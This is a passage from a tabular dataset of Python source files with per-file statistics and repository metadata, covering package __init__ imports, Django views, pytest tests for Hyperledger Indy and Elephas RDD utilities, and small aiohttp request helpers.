| 0
| 0.06976
| 0.19844
| 3,845
| 103
| 89
| 37.330097
| 0.69987
| 0
| 0
| 0.463415
| 0
| 0
| 0.064239
| 0
| 0
| 0
| 0.020026
| 0
| 0.085366
| 1
| 0.085366
| false
| 0
| 0.012195
| 0
| 0.097561
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
c574edff65ca1199b9bd1a2f87dc9943d1cfee99
| 32
|
py
|
Python
|
pelican/plugins/obsidian/__init__.py
|
jonathan-s/pelican-obsidian
|
9e84a9ec8b2a5018a90556c51e30a628994e0b4f
|
[
"MIT"
] | 13
|
2021-07-03T22:43:05.000Z
|
2022-03-28T11:10:57.000Z
|
pelican/plugins/obsidian/__init__.py
|
jonathan-s/pelican-obsidian
|
9e84a9ec8b2a5018a90556c51e30a628994e0b4f
|
[
"MIT"
] | null | null | null |
pelican/plugins/obsidian/__init__.py
|
jonathan-s/pelican-obsidian
|
9e84a9ec8b2a5018a90556c51e30a628994e0b4f
|
[
"MIT"
] | null | null | null |
from .obsidian import * # noqa
| 16
| 31
| 0.6875
| 4
| 32
| 5.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.21875
| 32
| 1
| 32
| 32
| 0.88
| 0.125
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
3d98c27b23aef75a9d72dad3a0712f7aeac0e851
| 82
|
py
|
Python
|
optim/__init__.py
|
danassutula/maximum_compliance
|
f2407bd9c5f7e36fe43aa51690433fe8bfb2f748
|
[
"MIT"
] | null | null | null |
optim/__init__.py
|
danassutula/maximum_compliance
|
f2407bd9c5f7e36fe43aa51690433fe8bfb2f748
|
[
"MIT"
] | null | null | null |
optim/__init__.py
|
danassutula/maximum_compliance
|
f2407bd9c5f7e36fe43aa51690433fe8bfb2f748
|
[
"MIT"
] | null | null | null |
from . import config
from . import filter
from .optim import TopologyOptimizer
| 13.666667
| 37
| 0.780488
| 10
| 82
| 6.4
| 0.6
| 0.3125
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.182927
| 82
| 5
| 38
| 16.4
| 0.955224
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
3db6d98b73af9be0b80b40e42923fde7c438d39b
| 36
|
py
|
Python
|
dizoo/procgen/coinrun/envs/__init__.py
|
sailxjx/DI-engine
|
c6763f8e2ba885a2a02f611195a1b5f8b50bff00
|
[
"Apache-2.0"
] | 464
|
2021-07-08T07:26:33.000Z
|
2022-03-31T12:35:16.000Z
|
dizoo/procgen/coinrun/envs/__init__.py
|
sailxjx/DI-engine
|
c6763f8e2ba885a2a02f611195a1b5f8b50bff00
|
[
"Apache-2.0"
] | 177
|
2021-07-09T08:22:55.000Z
|
2022-03-31T07:35:22.000Z
|
dizoo/procgen/coinrun/envs/__init__.py
|
sailxjx/DI-engine
|
c6763f8e2ba885a2a02f611195a1b5f8b50bff00
|
[
"Apache-2.0"
] | 92
|
2021-07-08T12:16:37.000Z
|
2022-03-31T09:24:41.000Z
|
from .coinrun_env import CoinRunEnv
| 18
| 35
| 0.861111
| 5
| 36
| 6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.111111
| 36
| 1
| 36
| 36
| 0.9375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
3dc2855d60986b506b511891f864c99ee2a1a15d
| 270
|
py
|
Python
|
qmhub/electools/elec_core/__init__.py
|
QCMM/dynqmprop
|
0f668072f623a2f5f209ab715bc264a83926309b
|
[
"MIT"
] | null | null | null |
qmhub/electools/elec_core/__init__.py
|
QCMM/dynqmprop
|
0f668072f623a2f5f209ab715bc264a83926309b
|
[
"MIT"
] | null | null | null |
qmhub/electools/elec_core/__init__.py
|
QCMM/dynqmprop
|
0f668072f623a2f5f209ab715bc264a83926309b
|
[
"MIT"
] | null | null | null |
try:
import numba
from . import elec_core_qmqm_numba as elec_core_qmqm
from . import elec_core_qmmm_numba as elec_core_qmmm
except ImportError:
from . import elec_core_qmqm_numpy as elec_core_qmqm
from . import elec_core_qmmm_numpy as elec_core_qmmm
| 33.75
| 56
| 0.796296
| 45
| 270
| 4.333333
| 0.266667
| 0.328205
| 0.287179
| 0.369231
| 0.594872
| 0.369231
| 0.369231
| 0.369231
| 0.369231
| 0
| 0
| 0
| 0.181481
| 270
| 7
| 57
| 38.571429
| 0.882353
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.857143
| 0
| 0.857143
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
9ad191035b2e150859cddd04c09f6204bb37c76f
| 154
|
py
|
Python
|
tableprint/__init__.py
|
veya2ztn/mltool
|
4ed151152845ebe3de128e1f53c478581c1492e4
|
[
"IJG"
] | null | null | null |
tableprint/__init__.py
|
veya2ztn/mltool
|
4ed151152845ebe3de128e1f53c478581c1492e4
|
[
"IJG"
] | null | null | null |
tableprint/__init__.py
|
veya2ztn/mltool
|
4ed151152845ebe3de128e1f53c478581c1492e4
|
[
"IJG"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Tableprint
"""
from .metadata import __author__, __version__
from .printer import *
from .style import *
from .utils import *
| 17.111111
| 45
| 0.688312
| 18
| 154
| 5.444444
| 0.666667
| 0.204082
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007752
| 0.162338
| 154
| 8
| 46
| 19.25
| 0.751938
| 0.214286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0.25
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
b118be6b633c0f4d26bcc6122d57059c978f77a2
| 40
|
py
|
Python
|
wepppy/wepp/soils/__init__.py
|
hwbeeson/wepppy
|
6358552df99853c75be8911e7ef943108ae6923e
|
[
"BSD-3-Clause"
] | null | null | null |
wepppy/wepp/soils/__init__.py
|
hwbeeson/wepppy
|
6358552df99853c75be8911e7ef943108ae6923e
|
[
"BSD-3-Clause"
] | null | null | null |
wepppy/wepp/soils/__init__.py
|
hwbeeson/wepppy
|
6358552df99853c75be8911e7ef943108ae6923e
|
[
"BSD-3-Clause"
] | null | null | null |
from .horizon_mixin import HorizonMixin
| 20
| 39
| 0.875
| 5
| 40
| 6.8
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1
| 40
| 1
| 40
| 40
| 0.944444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
b13762ae1b11dcb71e6b124eac5ecaa84a9aa2c9
| 45
|
py
|
Python
|
venv/lib/python2.7/site-packages/netlib/http2/__init__.py
|
sravani-m/Web-Application-Security-Framework
|
d9f71538f5cba6fe1d8eabcb26c557565472f6a6
|
[
"MIT"
] | 3
|
2019-04-09T22:59:33.000Z
|
2019-06-14T09:23:24.000Z
|
venv/lib/python2.7/site-packages/netlib/http2/__init__.py
|
sravani-m/Web-Application-Security-Framework
|
d9f71538f5cba6fe1d8eabcb26c557565472f6a6
|
[
"MIT"
] | null | null | null |
venv/lib/python2.7/site-packages/netlib/http2/__init__.py
|
sravani-m/Web-Application-Security-Framework
|
d9f71538f5cba6fe1d8eabcb26c557565472f6a6
|
[
"MIT"
] | null | null | null |
from frame import *
from protocol import *
| 15
| 23
| 0.733333
| 6
| 45
| 5.5
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.222222
| 45
| 2
| 24
| 22.5
| 0.942857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
b192ac18496ca59305437c4c1332cfbea5c5c539
| 161
|
py
|
Python
|
firefly/__init__.py
|
fuzzygroup/firefly
|
41724414eaa8884b030d7aedf11e45f09b6869e9
|
[
"Apache-2.0"
] | null | null | null |
firefly/__init__.py
|
fuzzygroup/firefly
|
41724414eaa8884b030d7aedf11e45f09b6869e9
|
[
"Apache-2.0"
] | null | null | null |
firefly/__init__.py
|
fuzzygroup/firefly
|
41724414eaa8884b030d7aedf11e45f09b6869e9
|
[
"Apache-2.0"
] | null | null | null |
from .app import Firefly
from .client import Client
from .version import __version__
try:
import configparser
except:
from six.moves import configparser
| 20.125
| 38
| 0.78882
| 21
| 161
| 5.857143
| 0.52381
| 0.292683
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.173913
| 161
| 7
| 39
| 23
| 0.924812
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.714286
| 0
| 0.714286
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
491a68722e6a7cebdddc94d65ce6d03fc0eecaeb
| 980
|
py
|
Python
|
wrappers/python/tests/ledger/test_build_pool_restart_request.py
|
absltkaos/indy-sdk
|
bc14c5b514dc1c76ce62dd7f6bf804120bf69f5e
|
[
"Apache-2.0"
] | 636
|
2017-05-25T07:45:43.000Z
|
2022-03-23T22:30:34.000Z
|
wrappers/python/tests/ledger/test_build_pool_restart_request.py
|
Nick-1979/indy-sdk
|
e5f812e14962f0d51cf96f843033754ff841ce30
|
[
"Apache-2.0"
] | 731
|
2017-05-29T07:15:08.000Z
|
2022-03-31T07:55:58.000Z
|
wrappers/python/tests/ledger/test_build_pool_restart_request.py
|
Nick-1979/indy-sdk
|
e5f812e14962f0d51cf96f843033754ff841ce30
|
[
"Apache-2.0"
] | 904
|
2017-05-25T07:45:49.000Z
|
2022-03-31T07:43:31.000Z
|
from indy import ledger
import json
import pytest
@pytest.mark.asyncio
async def test_build_pool_restart_request_work_for_start_action():
identifier = "Th7MpTaRZVRYnPiabds81Y"
expected_response = {
"identifier": identifier,
"operation": {
"type": "118",
"action": "start",
"datetime": "0",
}
}
request = json.loads(
await ledger.build_pool_restart_request(identifier, 'start', '0'))
assert expected_response.items() <= request.items()
@pytest.mark.asyncio
async def test_build_pool_restart_request_work_for_cancel_action():
identifier = "Th7MpTaRZVRYnPiabds81Y"
expected_response = {
"identifier": identifier,
"operation": {
"type": "118",
"action": "cancel",
}
}
request = json.loads(
await ledger.build_pool_restart_request(identifier, 'cancel', None))
assert expected_response.items() <= request.items()
| 24.5
| 76
| 0.635714
| 96
| 980
| 6.21875
| 0.354167
| 0.060302
| 0.107203
| 0.154104
| 0.850921
| 0.850921
| 0.720268
| 0.720268
| 0.720268
| 0.720268
| 0
| 0.019048
| 0.25
| 980
| 39
| 77
| 25.128205
| 0.793197
| 0
| 0
| 0.533333
| 0
| 0
| 0.142857
| 0.044898
| 0
| 0
| 0
| 0
| 0.066667
| 1
| 0
| false
| 0
| 0.1
| 0
| 0.1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
492ee598a77589786885516b40f7cc1c81caaa53
| 27
|
py
|
Python
|
detective/__init__.py
|
Little-Tetra/detective
|
af7683c7713eee93e6390903598c2e15eed01e57
|
[
"MIT"
] | null | null | null |
detective/__init__.py
|
Little-Tetra/detective
|
af7683c7713eee93e6390903598c2e15eed01e57
|
[
"MIT"
] | null | null | null |
detective/__init__.py
|
Little-Tetra/detective
|
af7683c7713eee93e6390903598c2e15eed01e57
|
[
"MIT"
] | null | null | null |
from .app import Detective
| 13.5
| 26
| 0.814815
| 4
| 27
| 5.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.148148
| 27
| 1
| 27
| 27
| 0.956522
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
496bbc3a1d4178133aaab47f072622dcb0a51769
| 104
|
py
|
Python
|
src/preprocessor/__init__.py
|
William9923/IF4072-SentimentClassification
|
5e22a6da418056955243c310bab0382e4683b781
|
[
"MIT"
] | null | null | null |
src/preprocessor/__init__.py
|
William9923/IF4072-SentimentClassification
|
5e22a6da418056955243c310bab0382e4683b781
|
[
"MIT"
] | null | null | null |
src/preprocessor/__init__.py
|
William9923/IF4072-SentimentClassification
|
5e22a6da418056955243c310bab0382e4683b781
|
[
"MIT"
] | null | null | null |
from src.preprocessor.interface import IPreprocessor
from src.preprocessor.impl import TextPreprocessor
| 34.666667
| 52
| 0.884615
| 12
| 104
| 7.666667
| 0.666667
| 0.152174
| 0.413043
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.076923
| 104
| 2
| 53
| 52
| 0.958333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
49764d1c4e4abe2b5cf3510ebbb2c9faa3f06032
| 43
|
py
|
Python
|
src/graphics/__init__.py
|
o92design/PythonSpelmotor
|
f8c75be2e51790a06fde8be8eb0a715913baebd8
|
[
"MIT"
] | null | null | null |
src/graphics/__init__.py
|
o92design/PythonSpelmotor
|
f8c75be2e51790a06fde8be8eb0a715913baebd8
|
[
"MIT"
] | null | null | null |
src/graphics/__init__.py
|
o92design/PythonSpelmotor
|
f8c75be2e51790a06fde8be8eb0a715913baebd8
|
[
"MIT"
] | null | null | null |
from .GraphicsEngine import GraphicsEngine
| 21.5
| 42
| 0.883721
| 4
| 43
| 9.5
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.093023
| 43
| 1
| 43
| 43
| 0.974359
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
49840fa880679be68812ac05e7e2ceefc3d5a204
| 90
|
py
|
Python
|
c__88.py
|
fhansmann/coding-challenges
|
eebb37565c72e05b77383c24e8273a1e4019b58e
|
[
"MIT"
] | null | null | null |
c__88.py
|
fhansmann/coding-challenges
|
eebb37565c72e05b77383c24e8273a1e4019b58e
|
[
"MIT"
] | null | null | null |
c__88.py
|
fhansmann/coding-challenges
|
eebb37565c72e05b77383c24e8273a1e4019b58e
|
[
"MIT"
] | null | null | null |
array = [[ [0 for col in range(8)] for col in range(5)] for row in range(3)]
print(array)
| 30
| 76
| 0.644444
| 19
| 90
| 3.052632
| 0.578947
| 0.362069
| 0.275862
| 0.448276
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.054795
| 0.188889
| 90
| 2
| 77
| 45
| 0.739726
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 6
|
4995430d22cd5e0f817a1cf9b8f773821d566785
| 134
|
py
|
Python
|
amocrm_asterisk_ng/crm/amocrm/widgets/asterisk_widget/functions/__init__.py
|
iqtek/amocrn_asterisk_ng
|
429a8d0823b951c855a49c1d44ab0e05263c54dc
|
[
"MIT"
] | null | null | null |
amocrm_asterisk_ng/crm/amocrm/widgets/asterisk_widget/functions/__init__.py
|
iqtek/amocrn_asterisk_ng
|
429a8d0823b951c855a49c1d44ab0e05263c54dc
|
[
"MIT"
] | null | null | null |
amocrm_asterisk_ng/crm/amocrm/widgets/asterisk_widget/functions/__init__.py
|
iqtek/amocrn_asterisk_ng
|
429a8d0823b951c855a49c1d44ab0e05263c54dc
|
[
"MIT"
] | null | null | null |
from .GetUsersEmailAddressesQuery import GetUsersEmailAddressesQuery
from .IsUserPhoneNumerQueryImpl import IsUserPhoneNumerQueryImpl
| 44.666667
| 68
| 0.925373
| 8
| 134
| 15.5
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.059701
| 134
| 2
| 69
| 67
| 0.984127
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
770939033610900ae0cb4e4ce864a2f56f676086
| 2,758
|
py
|
Python
|
tests/utils/test_rdd_utils.py
|
MichaelisTrofficus/elephas
|
579165865787e28d7b842af881ca3b6aa65e98ea
|
[
"MIT"
] | 1,674
|
2015-08-17T03:54:10.000Z
|
2022-03-29T12:07:43.000Z
|
tests/utils/test_rdd_utils.py
|
MichaelisTrofficus/elephas
|
579165865787e28d7b842af881ca3b6aa65e98ea
|
[
"MIT"
] | 183
|
2015-08-25T11:34:21.000Z
|
2022-03-22T15:33:59.000Z
|
tests/utils/test_rdd_utils.py
|
MichaelisTrofficus/elephas
|
579165865787e28d7b842af881ca3b6aa65e98ea
|
[
"MIT"
] | 359
|
2015-08-21T20:37:48.000Z
|
2022-03-23T15:41:12.000Z
|
import numpy as np
from elephas.utils import rdd_utils
def test_to_simple_rdd(spark_context):
features = np.ones((5, 10))
labels = np.ones((5,))
rdd = rdd_utils.to_simple_rdd(spark_context, features, labels)
assert rdd.count() == 5
first = rdd.first()
assert first[0].shape == (10,)
assert first[1] == 1.0
def test_to_labeled_rdd_categorical(spark_context):
features = np.ones((2, 10))
labels = np.asarray([[0, 0, 1.0], [0, 1.0, 0]])
lp_rdd = rdd_utils.to_labeled_point(spark_context, features, labels, True)
assert lp_rdd.count() == 2
first = lp_rdd.first()
assert first.features.shape == (10,)
assert first.label == 2.0
def test_to_labeled_rdd_not_categorical(spark_context):
features = np.ones((2, 10))
labels = np.asarray([[2.0], [1.0]])
lp_rdd = rdd_utils.to_labeled_point(spark_context, features, labels, False)
assert lp_rdd.count() == 2
first = lp_rdd.first()
assert first.features.shape == (10,)
assert first.label == 2.0
def test_from_labeled_rdd(spark_context):
features = np.ones((2, 10))
labels = np.asarray([[2.0], [1.0]]).reshape((2,))
lp_rdd = rdd_utils.to_labeled_point(spark_context, features, labels, False)
x, y = rdd_utils.from_labeled_point(lp_rdd, False, None)
assert x.shape == features.shape
assert y.shape == labels.shape
def test_from_labeled_rdd_categorical(spark_context):
features = np.ones((2, 10))
labels = np.asarray([[0, 0, 1.0], [0, 1.0, 0]])
lp_rdd = rdd_utils.to_labeled_point(spark_context, features, labels, True)
x, y = rdd_utils.from_labeled_point(lp_rdd, True, 3)
assert x.shape == features.shape
assert y.shape == labels.shape
def test_encode_label():
label = 3
nb_classes = 10
encoded = rdd_utils.encode_label(label, nb_classes)
assert len(encoded) == nb_classes
for i in range(10):
if i == label:
assert encoded[i] == 1
else:
assert encoded[i] == 0
def test_lp_to_simple_rdd_categorical(spark_context):
features = np.ones((2, 10))
labels = np.asarray([[0, 0, 1.0], [0, 1.0, 0]])
lp_rdd = rdd_utils.to_labeled_point(spark_context, features, labels, True)
rdd = rdd_utils.lp_to_simple_rdd(lp_rdd, categorical=True, nb_classes=3)
assert rdd.first()[0].shape == (10,)
assert rdd.first()[1].shape == (3,)
def test_lp_to_simple_rdd_not_categorical(spark_context):
features = np.ones((2, 10))
labels = np.asarray([[2.0], [1.0]]).reshape((2,))
lp_rdd = rdd_utils.to_labeled_point(spark_context, features, labels, False)
rdd = rdd_utils.lp_to_simple_rdd(lp_rdd, categorical=False, nb_classes=3)
assert rdd.first()[0].shape == (10,)
assert rdd.first()[1] == 2.0
| 32.069767
| 79
| 0.663162
| 435
| 2,758
| 3.967816
| 0.117241
| 0.097335
| 0.162225
| 0.089224
| 0.823291
| 0.803592
| 0.73175
| 0.73175
| 0.73175
| 0.695829
| 0
| 0.043848
| 0.18963
| 2,758
| 85
| 80
| 32.447059
| 0.728412
| 0
| 0
| 0.484375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.3125
| 1
| 0.125
| false
| 0
| 0.03125
| 0
| 0.15625
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
77156adb6b98fd98b7a209257fa4e4af836daf66
| 96
|
py
|
Python
|
composite_pattern/composite_wrapper.py
|
sebastianmaxwell1/sweepstakes_1
|
d76f4276e983f7ee971f8c6beefc53dff37c1bb3
|
[
"MIT"
] | null | null | null |
composite_pattern/composite_wrapper.py
|
sebastianmaxwell1/sweepstakes_1
|
d76f4276e983f7ee971f8c6beefc53dff37c1bb3
|
[
"MIT"
] | null | null | null |
composite_pattern/composite_wrapper.py
|
sebastianmaxwell1/sweepstakes_1
|
d76f4276e983f7ee971f8c6beefc53dff37c1bb3
|
[
"MIT"
] | null | null | null |
from composite_pattern.supervisor import Supervisor
from composite_pattern.worker import Worker
| 32
| 51
| 0.895833
| 12
| 96
| 7
| 0.5
| 0.309524
| 0.47619
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.083333
| 96
| 2
| 52
| 48
| 0.954545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
77267b525b4e3ce6f20a04a29a07292ed6b7f3be
| 319
|
py
|
Python
|
app/views.py
|
TheMoonWalker1/TJStar
|
bb9c9a0234386b52f870b18b2654ae25bdc8eed1
|
[
"Unlicense"
] | null | null | null |
app/views.py
|
TheMoonWalker1/TJStar
|
bb9c9a0234386b52f870b18b2654ae25bdc8eed1
|
[
"Unlicense"
] | null | null | null |
app/views.py
|
TheMoonWalker1/TJStar
|
bb9c9a0234386b52f870b18b2654ae25bdc8eed1
|
[
"Unlicense"
] | null | null | null |
from django.shortcuts import render
# Create your views here.
def home(request):
return render(request, 'index.html')
def speaker(request):
return render(request, 'speaker.html')
def contact(request):
return render(request, 'contact.html')
def event(request):
return render(request, 'event.html')
| 18.764706
| 42
| 0.717868
| 41
| 319
| 5.585366
| 0.439024
| 0.227074
| 0.331878
| 0.454148
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.159875
| 319
| 17
| 43
| 18.764706
| 0.854478
| 0.0721
| 0
| 0
| 0
| 0
| 0.149153
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.444444
| false
| 0
| 0.111111
| 0.444444
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
6229fafe21751af4c8163c4d7d00cb7eae0dcf24
| 1,153
|
py
|
Python
|
utils/net.py
|
DiNitride/gafbot
|
fdf0b8c89f3ac0b23681ce656ca08a3e8f26071d
|
[
"MIT"
] | 51
|
2016-10-05T18:05:17.000Z
|
2017-10-01T10:41:43.000Z
|
utils/net.py
|
DiNitride/gafbot
|
fdf0b8c89f3ac0b23681ce656ca08a3e8f26071d
|
[
"MIT"
] | 6
|
2017-05-19T22:32:39.000Z
|
2018-10-14T18:12:12.000Z
|
utils/net.py
|
DiNitride/gafbot
|
fdf0b8c89f3ac0b23681ce656ca08a3e8f26071d
|
[
"MIT"
] | 9
|
2016-10-08T07:11:47.000Z
|
2019-11-04T03:30:24.000Z
|
import aiohttp
# Working aiohttp get_url
# Now with closing sessions!
# Ty Rory
async def get_url(url, headers: dict = None):
headers = headers or {"user-agent" : "GAF Bot"}
async with aiohttp.ClientSession() as session:
async with session.get(url, headers=headers) as response:
status = response.status
if status != 200:
json = None
return response, json, status
try:
json = await response.json()
except Exception:
json = None
return response, json, status
async def post_url(url, data: dict = None, headers: dict = None):
headers = headers or {"user-agent": "GAF Bot"}
async with aiohttp.ClientSession() as session:
async with session.post(url, data=data, headers=headers) as response:
status = response.status
if status != 200:
json = None
return response, json, status
try:
json = await response.json()
except Exception:
json = None
return response, json, status
| 31.162162
| 77
| 0.562012
| 127
| 1,153
| 5.07874
| 0.283465
| 0.111628
| 0.086822
| 0.136434
| 0.8
| 0.8
| 0.8
| 0.8
| 0.8
| 0.8
| 0
| 0.008097
| 0.357329
| 1,153
| 36
| 78
| 32.027778
| 0.862348
| 0.050304
| 0
| 0.814815
| 0
| 0
